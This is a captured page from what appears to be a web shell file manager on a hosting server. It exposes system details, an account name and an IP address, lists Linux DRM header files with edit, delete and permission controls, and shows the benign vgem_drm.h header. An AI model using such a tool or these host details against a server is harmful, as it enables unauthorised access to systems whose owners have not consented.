[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
include
/
drm
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 amdgpu_drm.h
37,414 B
SET
[ EDIT ]
|
[ DEL ]
📄 armada_drm.h
1,212 B
SET
[ EDIT ]
|
[ DEL ]
📄 drm.h
37,778 B
SET
[ EDIT ]
|
[ DEL ]
📄 drm_fourcc.h
66,592 B
SET
[ EDIT ]
|
[ DEL ]
📄 drm_mode.h
39,789 B
SET
[ EDIT ]
|
[ DEL ]
📄 drm_sarea.h
2,782 B
SET
[ EDIT ]
|
[ DEL ]
📄 etnaviv_drm.h
11,993 B
SET
[ EDIT ]
|
[ DEL ]
📄 exynos_drm.h
11,133 B
SET
[ EDIT ]
|
[ DEL ]
📄 habanalabs_accel.h
76,126 B
SET
[ EDIT ]
|
[ DEL ]
📄 i915_drm.h
125,071 B
SET
[ EDIT ]
|
[ DEL ]
📄 ivpu_accel.h
8,405 B
SET
[ EDIT ]
|
[ DEL ]
📄 lima_drm.h
5,052 B
SET
[ EDIT ]
|
[ DEL ]
📄 msm_drm.h
15,959 B
SET
[ EDIT ]
|
[ DEL ]
📄 nouveau_drm.h
6,640 B
SET
[ EDIT ]
|
[ DEL ]
📄 omap_drm.h
4,027 B
SET
[ EDIT ]
|
[ DEL ]
📄 panfrost_drm.h
8,448 B
SET
[ EDIT ]
|
[ DEL ]
📄 qxl_drm.h
4,131 B
SET
[ EDIT ]
|
[ DEL ]
📄 radeon_drm.h
38,236 B
SET
[ EDIT ]
|
[ DEL ]
📄 tegra_drm.h
21,641 B
SET
[ EDIT ]
|
[ DEL ]
📄 v3d_drm.h
14,899 B
SET
[ EDIT ]
|
[ DEL ]
📄 vc4_drm.h
14,457 B
SET
[ EDIT ]
|
[ DEL ]
📄 vgem_drm.h
1,971 B
SET
[ EDIT ]
|
[ DEL ]
📄 virtgpu_drm.h
7,340 B
SET
[ EDIT ]
|
[ DEL ]
📄 vmwgfx_drm.h
37,479 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: vgem_drm.h
/* * Copyright 2016 Intel Corporation * All Rights Reserved. * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the * "Software"), to deal in the Software without restriction, including * without limitation the rights to use, copy, modify, merge, publish, * distribute, sub license, and/or sell copies of the Software, and to * permit persons to whom the Software is furnished to do so, subject to * the following conditions: * * The above copyright notice and this permission notice (including the * next paragraph) shall be included in all copies or substantial portions * of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. * IN NO EVENT SHALL TUNGSTEN GRAPHICS AND/OR ITS SUPPLIERS BE LIABLE FOR * ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, * TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE * SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. * */ #ifndef _VGEM_DRM_H_ #define _VGEM_DRM_H_ #include "drm.h" #if defined(__cplusplus) extern "C" { #endif /* Please note that modifications to all structs defined here are * subject to backwards-compatibility constraints. */ #define DRM_VGEM_FENCE_ATTACH 0x1 #define DRM_VGEM_FENCE_SIGNAL 0x2 #define DRM_IOCTL_VGEM_FENCE_ATTACH DRM_IOWR( DRM_COMMAND_BASE + DRM_VGEM_FENCE_ATTACH, struct drm_vgem_fence_attach) #define DRM_IOCTL_VGEM_FENCE_SIGNAL DRM_IOW( DRM_COMMAND_BASE + DRM_VGEM_FENCE_SIGNAL, struct drm_vgem_fence_signal) struct drm_vgem_fence_attach { __u32 handle; __u32 flags; #define VGEM_FENCE_WRITE 0x1 __u32 out_fence; __u32 pad; }; struct drm_vgem_fence_signal { __u32 fence; __u32 flags; }; #if defined(__cplusplus) } #endif #endif /* _VGEM_DRM_H_ */